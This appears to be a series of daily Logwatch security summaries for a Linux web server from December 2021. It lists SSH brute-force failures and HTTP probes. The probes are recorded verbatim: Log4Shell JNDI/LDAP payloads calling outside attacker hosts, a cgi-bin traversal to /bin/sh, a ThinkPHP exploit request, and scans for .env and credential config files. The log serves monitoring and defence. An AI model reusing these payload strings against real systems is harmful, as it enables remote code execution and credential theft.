Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 24 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-23 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 16:16 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
49.113.101.166 -> zapf.wiki:443: 1 Time(s)
A total of 11 sites probed the server
Requests with error response codes
400 Bad Request
null: 13 Time(s)
/: 5 Time(s)
mstshash=Domain: 4 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/robots.txt: 1 Time(s)
zapf.wiki:443: 1 Time(s)
403 Forbidden
/FrcS3CFURGOhH8IZnOVeEw?both=: 1 Time(s)
499 (undefined)
/: 6 Time(s)
/${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s)
/?s=${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s)
500 Internal Server Error
/: 44 Time(s)
/.env: 4 Time(s)
/.git/HEAD: 2 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/robots.txt: 2 Time(s)
//login_sid.lua: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/solr/: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 139 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
3 Miscellaneous warnings
10.191K Bytes accepted 10,436
10.191K Bytes sent via SMTP 10,436
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
231 Connections
131 Connections lost (inbound)
231 Disconnections
1 Removed from queue
1 Sent via SMTP
44 Timeouts (inbound)
1 Illegal address syntax in SMTP command
2 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 1 Time(s)
Failed logins from:
Illegal users from:
**Unmatched Entries**
Protocol major versions differ for 134.122.134.150: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Server : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 9 months
Delivery Status Notification (Failure)
by Mail Delivery Subsystem
** Recipient inbox full **
Your message couldn't be delivered to vik.t.oria.ilov.eba.c.kch.a.m(a)gmail.com. Their inbox is full, or it's getting too much mail right now.
The response was:
Storage quota exceeded
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Dec 23 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-22 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 32:32 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
91.200.100.126 -> 45.155.173.143:4444: 5 Time(s)
A total of 7 sites probed the server
Requests with error response codes
400 Bad Request
null: 22 Time(s)
45.155.173.143:4444: 5 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 3 Time(s)
/: 2 Time(s)
/config/getuser?index=0: 2 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... _TLsdTRoxSBAAAW: 2 Time(s)
mstshash=Administr: 2 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... W5I7k7RravlAAAT: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... p5mA-UjrOXyAAAS: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... pM21c5kUUiOAAAU: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... qI2zCCy58PcAAAX: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 2 Time(s)
//2020/wp-includes/wlwmanifest.xml: 2 Time(s)
//blog/wp-includes/wlwmanifest.xml: 2 Time(s)
//cms/wp-includes/wlwmanifest.xml: 2 Time(s)
//news/wp-includes/wlwmanifest.xml: 2 Time(s)
//shop/wp-includes/wlwmanifest.xml: 2 Time(s)
//site/wp-includes/wlwmanifest.xml: 2 Time(s)
//sito/wp-includes/wlwmanifest.xml: 2 Time(s)
//test/wp-includes/wlwmanifest.xml: 2 Time(s)
//web/wp-includes/wlwmanifest.xml: 2 Time(s)
//website/wp-includes/wlwmanifest.xml: 2 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp-includes/wlwmanifest.xml: 2 Time(s)
//wp/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
//xmlrpc.php?rsd: 2 Time(s)
499 (undefined)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... RngaPq2OBBlAAAV: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... W5I7k7RravlAAAT: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... p5mA-UjrOXyAAAS: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... pM21c5kUUiOAAAU: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... MESwy-Vc1O8AAAY: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... _TLsdTRoxSBAAAW: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... qI2zCCy58PcAAAX: 1 Time(s)
500 Internal Server Error
/: 20 Time(s)
/robots.txt: 4 Time(s)
/.env: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/ReportServer: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/clover/gui/login.jsf: 1 Time(s)
/favicon.ico: 1 Time(s)
/fuel: 1 Time(s)
/login: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 147 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
2 Miscellaneous warnings
9.604K Bytes accepted 9,834
9.604K Bytes sent via SMTP 9,834
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
64 Connections
15 Connections lost (inbound)
64 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Wed Dec 22 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-21 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 8:8 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
58.48.130.197 -> zapf.wiki:443: 1 Time(s)
A total of 7 sites probed the server
Requests with error response codes
400 Bad Request
null: 8 Time(s)
/: 5 Time(s)
mstshash=Domain: 4 Time(s)
/config/getuser?index=0: 2 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... 9ozdKvGWN2CAAAF: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
http://fuwu.sogou.com/404/index.html: 2 Time(s)
/.git/config: 1 Time(s)
/bag2: 1 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... fAQi2nHYbDLAAAG: 1 Time(s)
mstshash=Administr: 1 Time(s)
zapf.wiki:443: 1 Time(s)
499 (undefined)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... 9ozdKvGWN2CAAAF: 1 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... DFGGywPP27KAAAH: 1 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... fAQi2nHYbDLAAAG: 1 Time(s)
500 Internal Server Error
/: 22 Time(s)
/.env: 5 Time(s)
/.git/config: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.ftpconfig: 1 Time(s)
/.remote-sync.json: 1 Time(s)
/.vscode/ftp-sync.json: 1 Time(s)
/.vscode/sftp.json: 1 Time(s)
/actuator/health: 1 Time(s)
/api/.env: 1 Time(s)
/api/.ftpconfig: 1 Time(s)
/api/.git/config: 1 Time(s)
/api/.remote-sync.json: 1 Time(s)
/api/.vscode/ftp-sync.json: 1 Time(s)
/api/.vscode/sftp.json: 1 Time(s)
/api/deployment-config.json: 1 Time(s)
/api/ftpsync.settings: 1 Time(s)
/api/sftp-config.json: 1 Time(s)
/deployment-config.json: 1 Time(s)
/favicon.ico: 1 Time(s)
/ftpsync.settings: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/robots.txt: 1 Time(s)
/sftp-config.json: 1 Time(s)
502 Bad Gateway
/siegen17/pdf: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtSYsPh: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtSYsfL: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtSYsvE: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 139 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
4 Miscellaneous warnings
9.648K Bytes accepted 9,880
9.648K Bytes sent via SMTP 9,880
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
1903 Connections
1844 Connections lost (inbound)
1903 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Dec 21 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-20 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 16:16 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
222.186.19.235 -> zapf.wiki:443: 1 Time(s)
A total of 9 sites probed the server
Requests with error response codes
400 Bad Request
null: 9 Time(s)
mstshash=Administr: 5 Time(s)
/: 2 Time(s)
mstshash=Domain: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/api/v1: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/manager/html: 1 Time(s)
F\x83\xA5D\xBBgtN\xEC\xE8\xAF\xA5\x8D`&UU\ ... x09\xC0\x14\xC0: 1 Time(s)
HTTP/1.0: 1 Time(s)
T\xDF\x96USST\x11.O\x03\xD6D\x05/\xF07\xA6 ... x09\xC0\x14\xC0: 1 Time(s)
\x88:\xAB(\xBC\x9A\xBBz\x88e\xC9E\xD7\x02S: 1 Time(s)
g\xC1\x81i\xB3\xF6\xF2\xCB\xB0\xA9\x19N\xD ... x09\xC0\x13\xC0: 1 Time(s)
zapf.wiki:443: 1 Time(s)
403 Forbidden
/FrcS3CFURGOhH8IZnOVeEw: 1 Time(s)
404 Not Found
/konstanz/2016/tagung/impressum.html: 1 Time(s)
/konstanz/2016/tagung/index.html: 1 Time(s)
/konstanz/2016/tagung/unterstuetzer/Sponsoren.html: 1 Time(s)
/konstanz/2016/unterstuetzer/impressum.html: 1 Time(s)
/konstanz/2016/unterstuetzer/index.html: 1 Time(s)
/konstanz/2016/unterstuetzer/tagung/programm.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/wasistdiezapf.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/wersindwir.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/willkommen.html: 1 Time(s)
/konstanz/2016/willkommen/impressum.html: 1 Time(s)
/konstanz/2016/willkommen/index.html: 1 Time(s)
/konstanz/2016/willkommen/tagung/programm.html: 1 Time(s)
/konstanz/2016/willkommen/unterstuetzer/Sponsoren.html: 1 Time(s)
499 (undefined)
/: 4 Time(s)
500 Internal Server Error
/: 23 Time(s)
/.env: 7 Time(s)
/robots.txt: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/api/v1: 1 Time(s)
/bag2: 1 Time(s)
/console/: 1 Time(s)
/hmc/hybris: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/solr/: 1 Time(s)
/tips/tipsSimulationUpload.action: 1 Time(s)
502 Bad Gateway
/D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtPLnYm: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 108 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
8.793K Bytes accepted 9,004
8.793K Bytes sent via SMTP 9,004
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
1405 Connections
1356 Connections lost (inbound)
1405 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 1 Time(s)
Failed logins from:
Illegal users from:
**Unmatched Entries**
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Dec 20 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-19 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 28:28 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 5 sites probed the server
Requests with error response codes
400 Bad Request
null: 8 Time(s)
mstshash=Domain: 4 Time(s)
/: 3 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 2 Time(s)
default.asp: 2 Time(s)
mstshash=Administr: 2 Time(s)
/.env: 1 Time(s)
/10196510: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/manager/text/list: 1 Time(s)
7: 1 Time(s)
\xBB: 1 Time(s)
}\xD1>\xD8\x8E\xD1{\x1D\xFC\xF2kr\xC6\x01\ ... xBE\x00\xBD\xC0: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
/.env: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D: 1 Time(s)
/GponForm/diag_Form?style/: 1 Time(s)
/actuator/health: 1 Time(s)
/favicon.ico: 1 Time(s)
/owa/: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (101.96.76.242): 43 Time(s)
root (1.116.25.72): 41 Time(s)
root (121.201.34.21): 34 Time(s)
root (211.157.148.2): 33 Time(s)
root (162.243.20.232): 31 Time(s)
root (1.14.49.221): 30 Time(s)
root (211.219.114.39): 27 Time(s)
root (119.29.60.96): 25 Time(s)
root (125.141.139.7): 25 Time(s)
unknown (162.243.20.232): 19 Time(s)
root (111.198.33.54): 17 Time(s)
root (139.198.13.109): 17 Time(s)
unknown (139.198.13.109): 17 Time(s)
unknown (121.201.34.21): 16 Time(s)
unknown (211.157.148.2): 16 Time(s)
root (114.67.116.17): 15 Time(s)
unknown (1.14.49.221): 14 Time(s)
unknown (119.29.60.96): 12 Time(s)
unknown (211.219.114.39): 11 Time(s)
root (183.194.212.16): 10 Time(s)
root (120.92.79.133): 7 Time(s)
unknown (101.96.76.242): 7 Time(s)
unknown (111.198.33.54): 7 Time(s)
unknown (1.116.25.72): 6 Time(s)
unknown (114.67.116.17): 6 Time(s)
unknown (125.141.139.7): 6 Time(s)
unknown (183.194.212.16): 6 Time(s)
root (115.221.81.85): 4 Time(s)
root (220.179.231.222): 4 Time(s)
unknown (120.92.79.133): 4 Time(s)
root (121.66.109.90): 3 Time(s)
root (36.110.228.254): 3 Time(s)
unknown (182.48.114.140): 3 Time(s)
root (40.125.214.159): 2 Time(s)
unknown (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 Time(s)
unknown (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 Time(s)
news (125.141.139.7): 1 Time(s)
root (114.7.162.198): 1 Time(s)
root (36.91.61.178): 1 Time(s)
unknown (115.221.81.85): 1 Time(s)
unknown (116.52.144.172): 1 Time(s)
unknown (220.179.231.222): 1 Time(s)
unknown (36.133.163.35): 1 Time(s)
unknown (40.125.214.159): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
Invalid Users:
Unknown Account: 160 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
5 Miscellaneous warnings
13.067K Bytes accepted 13,381
13.067K Bytes sent via SMTP 13,381
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
29 Connections
11 Connections lost (inbound)
29 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.14.49.221: 30 times
1.116.25.72: 41 times
36.91.61.178: 1 time
36.110.228.254: 3 times
40.125.214.159: 2 times
101.96.76.242 (ci96.76-242.netnam.vn): 43 times
111.198.33.54: 17 times
114.7.162.198 (114-7-162-198.resources.indosat.com): 1 time
114.67.116.17: 15 times
115.221.81.85: 4 times
119.29.60.96: 25 times
120.92.79.133: 7 times
121.66.109.90: 3 times
121.201.34.21 (121.201.34.21): 34 times
125.141.139.7: 26 times
139.198.13.109: 17 times
162.243.20.232: 31 times
183.194.212.16 (.): 10 times
211.157.148.2: 33 times
211.219.114.39: 27 times
220.179.231.222: 4 times
Illegal users from:
2001:470:1:c84::16: 1 time
undef: 120 times
1.14.49.221: 14 times
1.116.25.72: 6 times
31.19.217.237 (ip1f13d9ed.dynamic.kabel-deutschland.de): 2 times
36.133.163.35: 1 time
40.125.214.159: 1 time
45.83.66.144: 1 time
45.141.84.10: 1 time
64.62.197.152: 1 time
101.96.76.242 (ci96.76-242.netnam.vn): 7 times
109.74.204.123 (li151-123.members.linode.com): 1 time
111.198.33.54: 7 times
114.67.116.17: 6 times
115.221.81.85: 1 time
116.52.144.172: 1 time
119.29.60.96: 12 times
120.92.79.133: 4 times
121.201.34.21 (121.201.34.21): 16 times
125.141.139.7: 6 times
139.198.13.109: 17 times
162.243.20.232: 19 times
182.48.114.140: 3 times
183.194.212.16 (.): 6 times
193.169.254.138: 1 time
207.161.138.65 (wnpgmb0538w-ds01-138-65.dynamic.bellmts.net): 2 times
211.157.148.2: 16 times
211.219.114.39: 11 times
220.179.231.222: 1 time
**Unmatched Entries**
fatal: Unable to negotiate a key exchange method [preauth] : 1 time(s)
Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s)
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s)
Protocol major versions differ for 109.74.204.123: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-NmapNSE_1.0 : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Dec 19 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-18 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 31:31 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
195.189.96.245 -> 91.200.100.126:4444: 1 Time(s)
A total of 7 sites probed the server
103.153.76.212
139.59.30.25
216.238.73.231
34.77.162.18
5.188.210.227
61.219.11.151
66.240.205.34
Requests with error response codes
400 Bad Request
null: 42 Time(s)
/: 14 Time(s)
\x5Cxbf\x5Cx02\x5Cx00\x5Cx88\x5Cx13\x5Cx00 ... \x5Cx9e\x5Cx16E: 4 Time(s)
xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 3 Time(s)
mstshash=Domain: 2 Time(s)
!\xF0JU\x19\xD5\xE4\xDA\xD7v\xBFw\x9C\xBB\x98\x84\xB4Ls: 1 Time(s)
&}\xBA[w}u\xA43\x9A\x823\xEEuz;f\xEAg|\xB7 ... C0$\x13\x05\xC0: 1 Time(s)
)FQ\x09\xF2A}\xDEpF\xEC\xB7\x9E6\x99\xA9\x ... C0\xAE\xC0+\xC0: 1 Time(s)
/c/version.js: 1 Time(s)
/flu/403.html: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
1\x0F\x9E\xDA4\xAFU\xA8h\xDC\x0F\xEB\x9D?\ ... C\x04\xF8\xF97Q: 1 Time(s)
2\x7F\xC4\x94\x9E\xF6v\xD5\xCC\x97\xB7\xB2 ... x09\xC0\x13\xC0: 1 Time(s)
91.200.100.126:4444: 1 Time(s)
499 (undefined)
/: 5 Time(s)
/${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?id=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?page=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?s=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?v=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 32 Time(s)
/.env: 5 Time(s)
/robots.txt: 5 Time(s)
/nice%20ports%2C/Tri%6Eity.txt%2ebak: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?q=%hydroparastatae%&va=b&t=hc&ia=web: 1 Time(s)
/Telerik.Web.UI.WebResource.axd?type=rau: 1 Time(s)
/actuator/health: 1 Time(s)
/admin/public/index.html: 1 Time(s)
/c/version.js: 1 Time(s)
/cgi-bin/config.exp: 1 Time(s)
/flu/403.html: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/remote/login: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (49.234.30.113): 37 Time(s)
root (111.229.4.66): 33 Time(s)
root (121.4.118.208): 32 Time(s)
root (203.160.55.212): 25 Time(s)
root (36.91.119.221): 24 Time(s)
root (120.133.56.246): 21 Time(s)
root (165.22.220.159): 20 Time(s)
unknown (121.4.118.208): 18 Time(s)
root (139.198.4.166): 14 Time(s)
